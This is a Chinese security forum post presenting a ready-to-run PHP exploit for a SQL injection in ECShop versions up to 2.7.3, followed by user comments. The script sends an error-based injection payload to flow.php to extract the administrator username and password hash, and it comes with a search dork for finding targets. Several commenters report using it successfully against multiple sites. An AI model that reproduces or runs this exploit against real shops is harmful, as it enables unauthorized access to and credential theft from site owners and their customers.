ECShop <= v2.7.3 SQL injection / exploit

2012-10-10 00:21:29 20 xiaoxiaoabc 6406 1

好像是最新的

<?php

print_r('

+---------------------------------------------------------------------------+

ECShop <= v2.7.3 SQL injection /  exploit

by 帅的一塌糊涂

mail: hiqiushuiabc gmail dot com

team: [url]http://hi.baidu.com/w5r2[/url]

dork: "Powered by ECShop"

+---------------------------------------------------------------------------+

');

if ($argc < 3) {

    print_r('

+---------------------------------------------------------------------------+

Usage: php '.$argv[0].' host path

host:      target server (ip/hostname)

path:      path to ecshop

Example:

php '.$argv[0].' localhost /ecshop/

+---------------------------------------------------------------------------+

');

    exit;

}

error_reporting(7);

ini_set('max_execution_time', 0);



$host = $argv[1];

$path = $argv[2];



$str = send();

if ( $str){

preg_match('/ouou~(.*?)~1/', $str, $arr);

$result=explode("-",$arr[1]);

if($result[0]=="")

{

print_r("Exploit Failed! \n");

}

else

{

print_r("Exploit Success! \nusername:".$result[0]."\npassword:".$result[1]."\n");

}

}

function send()

{

    global $host, $path;



    $cmd ='step=update_cart&goods_number[-111%27%20and(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20concat(0x6F756F757E,user_name,0x2D,password,0x7E31)%20FROM%20ecs_admin_user%20limit%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)#]=2';



    $data = "POST ".$path."flow.php  HTTP/1.1\r\n";

    $data .= "Accept: */*\r\n";

    $data .= "Accept-Language: zh-cn\r\n";

    $data .= "Content-Type: application/x-www-form-urlencoded\r\n";

    $data .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";

    $data .= "Host: $host\r\n";

    $data .= "Content-Length: ".strlen($cmd)."\r\n";

    $data .= "Connection: Close\r\n\r\n";

    $data .= $cmd;



    $fp = fsockopen($host, 80);

    fputs($fp, $data);



    $resp = '';



    while ($fp && !feof($fp))

        $resp .= fread($fp, 1024);



    return $resp;

echo $resp;

}



?>

类别 Web安全

关于作者

xiaoxiaoabc68篇文章774篇回复

function flow_update_cart($arr) { foreach ($arr AS $key => $val) { $val = intval(make_semiangle($val)); if ($val <= 0 && !is_numeric($key)) //$val大于零就轻松跳过这里 { continue; } $sql = "SELECT `goods_id`, `goods_attr_id`, `product_id`, `extension_code` FROM" .$GLOBALS['ecs']->table('cart'). " WHERE rec_id='$key' AND session_id='" . SESS_ID . "'"; $goods = $GLOBALS['db']->getRow($sql);

评论20次

要评论？请先登录或注册

20楼

joli
2012-12-25 11:49

成功了好几个，顶一下~~~~~~~~~~

回复|@ta|踩(0)|顶(0)
19楼

kim
2012-12-23 22:58

还是成功好几个的

回复|@ta|踩(0)|顶(0)
18楼

charlie
2012-12-23 17:27

要看人品爆发才能利用。、

回复|@ta|踩(0)|顶(0)
17楼

sw0rder1
2012-10-25 12:00

off 我试过了可以使用，这个跟配置还是有关xi

回复|@ta|踩(0)|顶(0)
16楼

咖啡000
2012-10-14 10:15

我是被首页图片xi引进来的

回复|@ta|踩(0)|顶(0)
15楼

0secin
2012-10-13 19:22

为什么你们总是赖不住空虚尼。。。。。。还没怎么玩这洞子就被公开了。。。

回复|@ta|踩(0)|顶(0)
14楼

vimeo
2012-10-12 13:08

靠！，，，，，，，，，原来黑客除了日站，还有副业，开黄网！！！！！！

回复|@ta|踩(0)|顶(0)
13楼

Calm
2012-10-12 11:43

回复|@ta|踩(0)|顶(0)
12楼

1943
2012-10-12 09:17

你那个blog真是害人啊。。貌似tools就你最活跃，xi望多看到新作品啊

回复|@ta|踩(0)|顶(0)
11楼

冰封
2012-10-10 20:48

老漏洞了只是官方没补，几个月前自己也发现了网上一查发现早在2010年大牛们就发现了 http://hi.baidu.com/xhmln9/item/775416085695c5163b53ee72

回复|@ta|踩(0)|顶(0)
10楼

妖妖灵
2012-10-10 16:34

我没成功过

回复|@ta|踩(0)|顶(0)
9楼

东兰sky
2012-10-10 15:39

好东西，支持。

回复|@ta|踩(0)|顶(0)
8楼

leehenwu
2012-10-10 12:36

off 的时候确实可以

回复|@ta|踩(0)|顶(0)
7楼

xiaoxiaoabc
2012-10-10 12:33

确实很鸡肋。

回复|@ta|踩(0)|顶(0)
6楼

bylucifer
2012-10-10 10:38

php6 取消GPC？

回复|@ta|踩(0)|顶(0)
5楼

gmm
2012-10-10 09:57

黑阔被误解了 0.0

回复|@ta|踩(0)|顶(0)
4楼

yzx65
2012-10-10 08:54

确实有点鸡肋，随手试了下，没一个成功

回复|@ta|踩(0)|顶(0)

3楼

alibaba

2012-10-10 01:53

这个漏洞确实存在，只是有点鸡肋必须是magic_quotes_gpc = off 而最新版本的2.7.3虽然做了一些过滤，但是看到那个过滤我笑了

回复|@ta|踩(0)|顶(0)

2楼

xiaoxiaoabc
2012-10-10 01:14

声明下，90sec那个hup是我。。。！！！，不想过多解释！

回复|@ta|踩(0)|顶(0)
1楼

Rices
2012-10-10 00:27

是上次乌云发那个吧在gpc没开的情况下 ecshop只过滤了value 而没过滤key 所以注射产生我以前读的时候也发现几个类似的key注射不过没在意因为当时我gpc是打开状态所以各位黑客使劲挖吧

回复|@ta|踩(0)|顶(0)

ECShop <= v2.7.3 SQL injection / exploit

关于作者

评论20次

成功了好几个，顶一下~~~~~~~~~~

还是成功好几个的

要看人品爆发才能利用。、

off 我试过了可以使用，这个跟配置还是有关xi

我是被首页图片xi引进来的

为什么你们总是赖不住空虚尼。。。。。。 还没怎么玩这洞子 就被公开了。。。

靠！，，，，，，，，，原来黑客除了日站，还有副业，开黄网！！！！！！

你那个blog真是害人啊。。 貌似tools就你最活跃，xi望多看到新作品啊

老漏洞了 只是官方没补，几个月前 自己也发现了 网上一查 发现早在2010年大牛们就发现了 http://hi.baidu.com/xhmln9/item/775416085695c5163b53ee72

我没成功过

好东西，支持。

off 的时候确实可以

确实很鸡肋。

php6 取消GPC？

黑阔被误解了 0.0

确实有点鸡肋，随手试了下，没一个成功

声明下，90sec那个hup是我。。。！！！，不想过多解释！

是上次乌云发那个吧 在gpc没开的情况下 ecshop只过滤了value 而没过滤key 所以注射产生 我以前读的时候也发现几个类似的key注射 不过没在意 因为当时我gpc是打开状态 所以各位黑客使劲挖吧

热门文章

渗透测试真实学院渗透思路分享

社会工程小世界找联系方式之拓展思路

安全资讯美国悬赏 1500 万美元追捕 LockBit 勒索软件头目

渗透测试溯源小技巧（邮箱、域名、电话、qq）

渗透测试[已重新编辑]AI与基础安全结合的新的攻击面

最新回复

精华推荐

渗透测试【Frida实战】某iOS APP逆向加密解密（含MitmProxy自动加密解密）

渗透测试postgres注入总结

手机无线iOS APP渗透之通信数据包加解密

渗透测试记一次对Discuz官方论坛的渗透检测

渗透测试WebShell系列(一)---XML

为什么你们总是赖不住空虚尼。。。。。。还没怎么玩这洞子就被公开了。。。

你那个blog真是害人啊。。貌似tools就你最活跃，xi望多看到新作品啊

老漏洞了只是官方没补，几个月前自己也发现了网上一查发现早在2010年大牛们就发现了 http://hi.baidu.com/xhmln9/item/775416085695c5163b53ee72

是上次乌云发那个吧在gpc没开的情况下 ecshop只过滤了value 而没过滤key 所以注射产生我以前读的时候也发现几个类似的key注射不过没在意因为当时我gpc是打开状态所以各位黑客使劲挖吧